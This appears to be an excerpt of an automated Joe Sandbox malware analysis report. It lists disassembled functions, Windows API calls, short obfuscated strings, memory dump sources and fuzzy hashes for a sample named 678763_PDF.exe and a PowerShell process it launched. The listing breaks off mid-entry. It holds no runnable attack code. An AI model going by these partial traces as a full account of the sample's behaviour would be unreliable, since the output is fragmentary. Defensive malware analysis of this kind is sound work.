Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406696,80000002), ref: 0040646B
RegCloseKey.ADVAPI32(?), ref: 00406476

Strings

: Completed, xrefs: 0040642C

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
Opcode Fuzzy Hash: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4

Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
GlobalFree.KERNEL32(00000000), ref: 00403BB5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC

Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\678763_PDF.exe,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 00405E78
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\678763_PDF.exe,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 00405E88

Strings

C:\Users\user\Desktop, xrefs: 00405E72

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Analysis Process: powershell.exePID: 7308, Parent PID: 7272COMMON

Executed Functions

Function 06ECB897 Relevance: 14.8, Strings: 11, Instructions: 1019COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06ECBE41
4'^q, xrefs: 06ECC5C4
(f}l, xrefs: 06ECC7F3
4zl, xrefs: 06ECC4D0
x.nk, xrefs: 06ECC070
4'^q, xrefs: 06ECC5DA
4'^q, xrefs: 06ECBE35
x.nk, xrefs: 06ECC9AD
-nk, xrefs: 06ECC0A2
(f}l, xrefs: 06ECC7DD
4zl, xrefs: 06ECC4C6

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l$4'^q$4'^q$4'^q$4'^q$4zl$4zl$x.nk$x.nk$-nk
API String ID: 0-4210006951
Opcode ID: 3c392e4e717951f24dddde8136b05c0a0529d61aadfa00e029b974568a4e1b00
Instruction ID: 4a0df95e790c7eda17fc26e6894374996e2f68f3d45f1bee912b6d1603d27a02
Opcode Fuzzy Hash: 3c392e4e717951f24dddde8136b05c0a0529d61aadfa00e029b974568a4e1b00
Instruction Fuzzy Hash: 6EA27D74A00318DFDB54CB18CE51FAABBB2AB85714F118199D9096F391CB72ED82CF91

Function 08B31AC8 Relevance: 14.6, Strings: 11, Instructions: 814COMMON

Download Yara Rule

Strings

84{l, xrefs: 08B31B23
84{l, xrefs: 08B31B2D
tP^q, xrefs: 08B31AF9
4'^q, xrefs: 08B320BF
84{l, xrefs: 08B31C0F
$^q, xrefs: 08B32097
$^q, xrefs: 08B3207B
84{l, xrefs: 08B31C1B
tP^q, xrefs: 08B31B03
$^q, xrefs: 08B320A3
4'^q, xrefs: 08B320CB

Memory Dump Source

Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$84{l$84{l$84{l$84{l$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-2291183878
Opcode ID: 0a0b269ab9f10812de0e3ce55fe720920a3744c744cbfea09705481483d11977
Instruction ID: 56c5ed3629d2b088ecfcb0dd091e02b87b22a1e88fbda240d68a6fe1c89122ab
Opcode Fuzzy Hash: 0a0b269ab9f10812de0e3ce55fe720920a3744c744cbfea09705481483d11977
Instruction Fuzzy Hash: 7A520630B00225DFCB14DF68D95066ABBE6FF84312F1484EAE9159B391DB32DD46CBA1

Function 06EC7FA0 Relevance: 10.4, Strings: 8, Instructions: 373COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06EC82A9
-nk, xrefs: 06EC83B9
4'^q, xrefs: 06EC8334
4'^q, xrefs: 06EC8328
(f}l, xrefs: 06EC80C1
x.nk, xrefs: 06EC8374
4'^q, xrefs: 06EC82B5
(f}l, xrefs: 06EC80CB

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l$4'^q$4'^q$4'^q$4'^q$x.nk$-nk
API String ID: 0-4149900085
Opcode ID: 7859b482b3aa9c2ba71f40d59b2930608805c0f63192597790d35b5465f1682e
Instruction ID: 90d2dc900644be809966775bec89dbbb91028d570ab5da5e44750b0204438fc4
Opcode Fuzzy Hash: 7859b482b3aa9c2ba71f40d59b2930608805c0f63192597790d35b5465f1682e
Instruction Fuzzy Hash: 16E19C70E002089FDB58DF68CA55B9FBBA3AF88314F159428D9056F395CB71EC46CBA1

Function 06ECF8D0 Relevance: 9.1, Strings: 7, Instructions: 312COMMON

Download Yara Rule

Strings

$^q, xrefs: 06ECF997
4'^q, xrefs: 06ECFA11
$^q, xrefs: 06ECF9A7
4'^q, xrefs: 06ECFA05
$^q, xrefs: 06ECF976
4'^q, xrefs: 06ECFBFE
4'^q, xrefs: 06ECFBF2

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3199432138
Opcode ID: 4b791c6b28f88fd032b4475958e58326deae90656a5d178747a2653db2cc085e
Instruction ID: bc0d1eec56600b38c5a293ede5928820f0ec6c8f2a40df79c852262e2a1f2c7b
Opcode Fuzzy Hash: 4b791c6b28f88fd032b4475958e58326deae90656a5d178747a2653db2cc085e
Instruction Fuzzy Hash: 96A13531B043059FCFA88F68D6106BABBA3AF85234F14906ED855CF395DB31D986C7A1

Function 06EC63E0 Relevance: 8.3, Strings: 6, Instructions: 833COMMON

Download Yara Rule

Strings

-nk, xrefs: 06EC6F34
4'^q, xrefs: 06EC6C8E
tP^q, xrefs: 06EC6490
tP^q, xrefs: 06EC6484
4'^q, xrefs: 06EC6C82
x.nk, xrefs: 06EC6F02

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$x.nk$-nk
API String ID: 0-1211429672
Opcode ID: 596539f98caa3ef94bb7c9c5143d5db343c602018fb1837023396949db36e7f1
Instruction ID: 527b55c51906f74e47c979f7c7285c92d60d605e2bd5c5d9d7989d0f6e23d0af
Opcode Fuzzy Hash: 596539f98caa3ef94bb7c9c5143d5db343c602018fb1837023396949db36e7f1
Instruction Fuzzy Hash: 0C726F70A003149FDB64CB58CA51FAABBB2FF84314F15C099D909AF355CB72ED868B91

Function 06EC7378 Relevance: 5.6, Strings: 4, Instructions: 591COMMON

Download Yara Rule

Strings

(f}l, xrefs: 06EC7B42
(f}l, xrefs: 06EC7B4C
4'^q, xrefs: 06EC7836
4'^q, xrefs: 06EC782A

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l$4'^q$4'^q
API String ID: 0-1177996258
Opcode ID: 11b39a795229d2c47653e886c1d638c7aca8f56e61567a5b33dedcb56414d756
Instruction ID: bd3c929ec52e2dc04aa12acc348b4df6214fd2ae44301f33d381987c6eeb4422
Opcode Fuzzy Hash: 11b39a795229d2c47653e886c1d638c7aca8f56e61567a5b33dedcb56414d756
Instruction Fuzzy Hash: 86325B74B012049FDB54CB98DA45F9ABBB2FF88324F158068E9059F365CB72EC46CB91

Function 06EC2070 Relevance: 5.6, Strings: 4, Instructions: 584COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06EC23AE
4'^q, xrefs: 06EC2508
4'^q, xrefs: 06EC2512
4'^q, xrefs: 06EC23B8

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: c643c1ab1fde33e190a8fd9f54d170ec3ec486829e7c6f095d52fc41f5a6fece
Instruction ID: 2e7f75f3817dd128939617488e6711aa98887c7b9d8f4cf96b4c2cf94d7b3c1a
Opcode Fuzzy Hash: c643c1ab1fde33e190a8fd9f54d170ec3ec486829e7c6f095d52fc41f5a6fece
Instruction Fuzzy Hash: F1125A31B143058FCB559B6C8A116AB7BA2AFC5324F14807EEA05DB391DB31DA47C7E2

Function 06EC70DB Relevance: 5.5, Strings: 4, Instructions: 488COMMON

Download Yara Rule

Strings

-nk, xrefs: 06EC6F34
j, xrefs: 06EC70EF
4'^q, xrefs: 06EC6C82
x.nk, xrefs: 06EC6F02

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$j$x.nk$-nk
API String ID: 0-33150587
Opcode ID: 659f4a68544f8509a7e214b31e2a0525526d66e7f7d9576c4f76a07f6103357f
Instruction ID: f6b2bdd4b41537179ae9a4fe3597424b3001a598fa401e81e7e09cbbafa6be69
Opcode Fuzzy Hash: 659f4a68544f8509a7e214b31e2a0525526d66e7f7d9576c4f76a07f6103357f
Instruction Fuzzy Hash: 3C224F70A002149FDB64DB18C951F9ABBB2FF85314F15C099E909AF351CB72ED868FA1

Function 06ECC2C1 Relevance: 5.4, Strings: 4, Instructions: 425COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06ECC5C4
x.nk, xrefs: 06ECC9AD
(f}l, xrefs: 06ECC7DD
4zl, xrefs: 06ECC4C6

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$4'^q$4zl$x.nk
API String ID: 0-756057160
Opcode ID: b4b2a850355681b83c462df05c96e27b6d61c2b7804119f5ea164c3f6f9ab769
Instruction ID: 7c6448f56165f0926471ba777d0d81eaa0645df86d83e587873160118f38d248
Opcode Fuzzy Hash: b4b2a850355681b83c462df05c96e27b6d61c2b7804119f5ea164c3f6f9ab769
Instruction Fuzzy Hash: A5125F74A00314DFDBA0CB18CA41BAAB7B2BB85714F2591D9D50D6B351CB72ED82CF91

Function 06ECC2AB Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06ECC5C4
x.nk, xrefs: 06ECC9AD
(f}l, xrefs: 06ECC7DD
4zl, xrefs: 06ECC4C6

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$4'^q$4zl$x.nk
API String ID: 0-756057160
Opcode ID: 00a3b766f7ae442205b95ded8b2bf23febb935087f98ac8baa3b2cc8806d30e3
Instruction ID: 08e327f4fb99daf2c10fcdbc7e7423f1da81749c3e666046c5febc33174d9532
Opcode Fuzzy Hash: 00a3b766f7ae442205b95ded8b2bf23febb935087f98ac8baa3b2cc8806d30e3
Instruction Fuzzy Hash: C7E14B74A00314DFDBA0CB14CA41BAAB7B2BB85714F2191D9D50DAB391CB72ED82CF91

Function 06EC6FCA Relevance: 4.4, Strings: 3, Instructions: 647COMMON

Download Yara Rule

Strings

-nk, xrefs: 06EC6F34
4'^q, xrefs: 06EC6C82
x.nk, xrefs: 06EC6F02

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.nk$-nk
API String ID: 0-4129445936
Opcode ID: 8213c422628d6f581bc2baebbcd73f094b9e7879d07f6168584d3a99b689c71f
Instruction ID: 05b211a2ce0a31be58a9140546a9227b608daaf2c98030b9789aa5aa0afcd749
Opcode Fuzzy Hash: 8213c422628d6f581bc2baebbcd73f094b9e7879d07f6168584d3a99b689c71f
Instruction Fuzzy Hash: 32523F74B002149FDB64DB18C951FAABBB2FB84314F15C099E909AF351CB72ED868F91

Function 06ECC13B Relevance: 4.4, Strings: 3, Instructions: 621COMMON

Download Yara Rule

Strings

x.nk, xrefs: 06ECC070
4'^q, xrefs: 06ECBE35
-nk, xrefs: 06ECC0A2

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.nk$-nk
API String ID: 0-4129445936
Opcode ID: e4a05da8d78e98f4894ad58f9321dfcf7f33dbb91cd4f215d388ae99252922b8
Instruction ID: de533fa2210282250a7e055b7cd8b36c75f8e1e6eeec137de7376ed597e8b1f2
Opcode Fuzzy Hash: e4a05da8d78e98f4894ad58f9321dfcf7f33dbb91cd4f215d388ae99252922b8
Instruction Fuzzy Hash: 8F428F74B003149FC750DB18CE51FAABBA2AF89714F158199D9096F391CB72ED82CF91

Function 06ECC221 Relevance: 4.2, Strings: 3, Instructions: 469COMMON

Download Yara Rule

Strings

x.nk, xrefs: 06ECC070
4'^q, xrefs: 06ECBE35
-nk, xrefs: 06ECC0A2

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.nk$-nk
API String ID: 0-4129445936
Opcode ID: 4df32de72b3d0bf72d471a2b071d78f5ecb2eebd235afad67f22e284d85e8f74
Instruction ID: 9d74d1d77eb145204882f1481b86415c0081cb536ab22c2817ce154405ea031c
Opcode Fuzzy Hash: 4df32de72b3d0bf72d471a2b071d78f5ecb2eebd235afad67f22e284d85e8f74
Instruction Fuzzy Hash: 31128E74B003149FCB50DB18CE51FAABBA2EB85704F118199E9096F391CB72ED82CF91

Function 06EC3E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

$^q, xrefs: 06EC3E5B
$^q, xrefs: 06EC3E23
$^q, xrefs: 06EC3E67

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 6fdcbb7a87c78abbd8e1b2726f54ece54e178c4441b7d90490c93c936174a8c1
Instruction ID: 5fc06d0e0cac21ab15c8239c5d1af8b42795ccce8d1aa3c40e792bd177bf502a
Opcode Fuzzy Hash: 6fdcbb7a87c78abbd8e1b2726f54ece54e178c4441b7d90490c93c936174a8c1
Instruction Fuzzy Hash: EB415732F003158FCBA45E699A406ABF7E5AF84620B24C92ED816DB345DF31DD06C7E1

Function 06EC4FB0 Relevance: 3.9, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

$^q, xrefs: 06EC5027
$^q, xrefs: 06EC5033
$^q, xrefs: 06EC5003

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 5766ba77c5243d28665bb800812d7fd49491fac926699d6c47c0f1a1210f6f3f
Instruction ID: 56c0ec9b8c2dc25b16dcbbc71a609d67749dd3bbd6da5b74c24afcb1da3c3f35
Opcode Fuzzy Hash: 5766ba77c5243d28665bb800812d7fd49491fac926699d6c47c0f1a1210f6f3f
Instruction Fuzzy Hash: CD314831E043458FC7658B288A116ABBBF1AF85238B14906FC455CB292EA32E856C7E1

Function 08B31FE0 Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

4'^q, xrefs: 08B320BF
$^q, xrefs: 08B32097
$^q, xrefs: 08B3207B

Memory Dump Source

Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: cf6519779fc29fb487434eec49d04e8ba026a464ef0407a9ac5f9560d1d4c092
Instruction ID: cde4b174bd7efe54ce42488b1cf80a145679cd67387b655c54d4136bb37d1ce2
Opcode Fuzzy Hash: cf6519779fc29fb487434eec49d04e8ba026a464ef0407a9ac5f9560d1d4c092
Instruction Fuzzy Hash: 7A215B35E00326DFDB258E55C684A66B7E1EF44623F0480EED9089B225D731E889CBA1

Function 06EC4548 Relevance: 2.9, Strings: 2, Instructions: 435COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06EC494F
4'^q, xrefs: 06EC4943

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: f36d2431712ff92fdcb5dbf1c52a1fd315778718fd472fcabbd1875c5caa900e
Instruction ID: 24bb9512e06a7b68d67a52d3a3e90ee202d107dd17d21dba0f1ce40eb2c4a068
Opcode Fuzzy Hash: f36d2431712ff92fdcb5dbf1c52a1fd315778718fd472fcabbd1875c5caa900e
Instruction Fuzzy Hash: 57028C74B00304DFDB54CB58CA61E9ABBF2EF85324F158069E9059B3A5CB72EC46CB91

Function 06EC8BC0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

(f}l, xrefs: 06EC8D04
